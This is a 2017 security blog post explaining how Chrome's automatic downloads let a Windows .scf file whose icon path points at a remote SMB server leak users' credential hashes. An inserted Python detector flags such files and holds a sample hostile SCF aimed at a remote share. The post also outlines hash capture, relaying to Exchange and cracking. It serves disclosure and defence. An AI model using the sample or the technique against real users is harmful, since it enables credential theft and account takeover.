Saturday 1 July 2017

How windows credentials can be stolen via Google Chrome

How Windows 7/8.1 and Windows 10 credentials can be stolen via Google Chrome

Attacks designed to leak user authentication data using the SMB protocol on Windows have been a long-standing issue, and though this has been exploited in a number of ways, it has always been restricted to local area networks. One of the rare displays of research in this domain was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015.

However, in the past decade or so there have been no publicly demonstrated attacks that steal user credentials over the SMB protocol from any platform other than Internet Explorer and the new Edge. This article gets into a theoretical area: how such an attack can be used to leak user authentication data through what is currently the world's most popular browser, Google Chrome.

On default settings, Chrome will automatically download files it deems safe without prompting for a download location; it simply uses the preset location. While this might not be an ideal approach from a security standpoint, it is convenient and isn't really dangerous behavior, considering every downloaded file has to be run by the user manually before it can do anything. However, what if there was a file that could run without any user interaction?

The Loophole

A Windows Explorer Shell Command File (.scf) is a lesser-known file format that has existed since Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP, when its primary use was as a "show desktop" shortcut. It is basically a text file with a section that determines the command that needs to be run and an icon file location. The commands are restricted to running Windows Explorer and toggling the desktop. An example of an SCF file:

The icon location is resolved as soon as the file is shown in Windows Explorer. Setting the icon location to an SMB server is a known attack vector that abuses the Windows automatic authentication feature used when accessing services like remote file shares. The same resolution, however, also happens for a Windows LNK file. What is the difference then? Chrome forces a .download extension onto the LNK file but not onto the SCF file. As mentioned above, this allows the SCF file to be downloaded and to run without user interaction.

An SCF file can be used to trick Windows into an authentication attempt against a remote SMB server. Such an SCF file requires only 2 lines, viz.


The file will therefore theoretically be able to contact the SMB server and trick the machine into an authentication request. At this point, the attacker can make the server capture the user name and password hash and use it to crack the actual password. In a different scenario, an attacker could simply divert the user's connection to a different service that is expected to accept the same user credentials, such as the Microsoft Exchange services used by Outlook, thereby enabling the attacker to impersonate the user without the user having even a hint of suspicion.

At this point, we also need to mention that an SCF file appears extension-less when viewed in Windows Explorer. For example, a file named Image.jpg.scf will actually appear as Image.jpg. Thus, it's very hard for a user to notice an SCF file. Also, most anti-virus software does not flag an SCF file as malicious, so do not expect your anti-virus to come to your aid here.
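As an added example (not code from the original post), the following Python checks a downloaded file the way a defender might: it flags .scf files, double extensions that hide the .scf suffix in Explorer, and IconFile entries that point at a UNC path on a remote host rather than a local icon. The sample file contents and the 203.0.113.5 host are constructed for this example.

```python
import re
import configparser
from pathlib import Path

# Constructed sample: an SCF whose IconFile points at a remote SMB share
# (documentation address 203.0.113.5), i.e. the pattern described above.
SUSPICIOUS_SCF = (
    "[Shell]\r\nCommand=2\r\n"
    "IconFile=\\\\203.0.113.5\\share\\icon.ico\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)
# Constructed sample: the classic "show desktop" SCF, icon taken from explorer.exe.
BENIGN_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)

# A UNC path: \\host\share\... (Windows also accepts forward slashes).
UNC_RE = re.compile(r"^\s*(\\\\|//)[^\\/]+[\\/]")


def scf_icon_targets(text):
    """Return every IconFile value in SCF text (INI syntax, keys case-insensitive)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return [cp[s]["iconfile"] for s in cp.sections() if "iconfile" in cp[s]]


def assess_download(name, text):
    """Classify a downloaded file by name and contents; returns a list of findings."""
    findings = []
    suffixes = [s.lower() for s in Path(name).suffixes]
    if suffixes and suffixes[-1] == ".scf":
        findings.append("scf-file")
        if len(suffixes) > 1:
            # Image.jpg.scf is displayed as Image.jpg by Explorer.
            findings.append("double-extension")
        for target in scf_icon_targets(text):
            if UNC_RE.match(target):
                findings.append("remote-icon:" + target)
    return findings


def scan_directory(folder):
    """Assess every .scf file in a download folder; returns {name: findings}."""
    return {p.name: assess_download(p.name, p.read_text(errors="replace"))
            for p in Path(folder).iterdir() if p.suffix.lower() == ".scf"}


if __name__ == "__main__":
    print(assess_download("Image.jpg.scf", SUSPICIOUS_SCF))
```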

Potential Impact

It's needless to spell out the negative impact having your credentials leaked can have. This gets even more serious when we consider that most users on Windows 8 and above use a Microsoft Account rather than a local account. This means that the same password is likely being used for all of your Microsoft services, including Skype, Xbox, Office 365, OneDrive, etc. This can end up being a nightmare for individuals who use an Outlook account for their work emails, potentially giving an attacker access to your corporation's data and network.

Even if the attacker manages to get just the password hash, password cracking has improved considerably in recent times. The hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s, that is, 1.6 billion hashes per second. Even without doing the math, one can see that it is realistically possible for the attacker to recover your password from just the hash.

Our Recommendation

To disable automatic downloads in Chrome, go to Settings -> Show advanced settings -> and check the "Ask where to save each file before downloading" option. Currently, all an attacker needs to do is get the user to visit the server; it doesn't even matter whether the user is an administrator on the machine. The measures that need to be taken depend on the affected user's network environment and range from simple host-level hardening and perimeter firewall rules to additional security measures such as SMB packet signing. Wherever possible, corporations should restrict SMB traffic to within their own networks. Hopefully, Google will patch this loophole now that it has been made public knowledge.

© 2013 ComboUpdates - Powered by Blogger
Released under Creative Commons 3.0 CC BY-NC 3.0